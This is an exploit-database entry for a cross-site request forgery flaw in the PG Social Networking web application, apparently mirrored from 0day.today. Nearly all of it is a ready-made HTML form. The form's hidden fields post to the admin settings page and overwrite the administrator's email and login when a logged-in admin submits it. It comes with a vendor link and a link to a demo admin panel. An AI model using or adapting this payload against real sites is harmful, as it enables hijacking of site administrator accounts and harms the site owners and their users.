id: 17904
date: 03/31/2012
title: PG Social Networking CSRF Vulnerability
author: Jonturk75
cves: 

# Exploit Title: PG Social Networking CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.socialbiz.pro/social/
# Category::  webapps
# Demo : http://demo.socialbiz.pro/social/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com





<form name="aname_form" action="admin_settings.php" method="post">
<input name="email" value="mail@mail.com" size="30" type="hidden"></td>
<input name="login" value="admin" size="30" type="hidden"></td>
<input name="fname" value="admin" size="30" type="hidden"></td>
<input name="sname" value="secondname" size="30" type="hidden"></td>
<input value="Save" class="button" onclick="javascript:document.aname_form.submit();" type="button"></td>
</form>



#  0day.today [2023-03-27]  #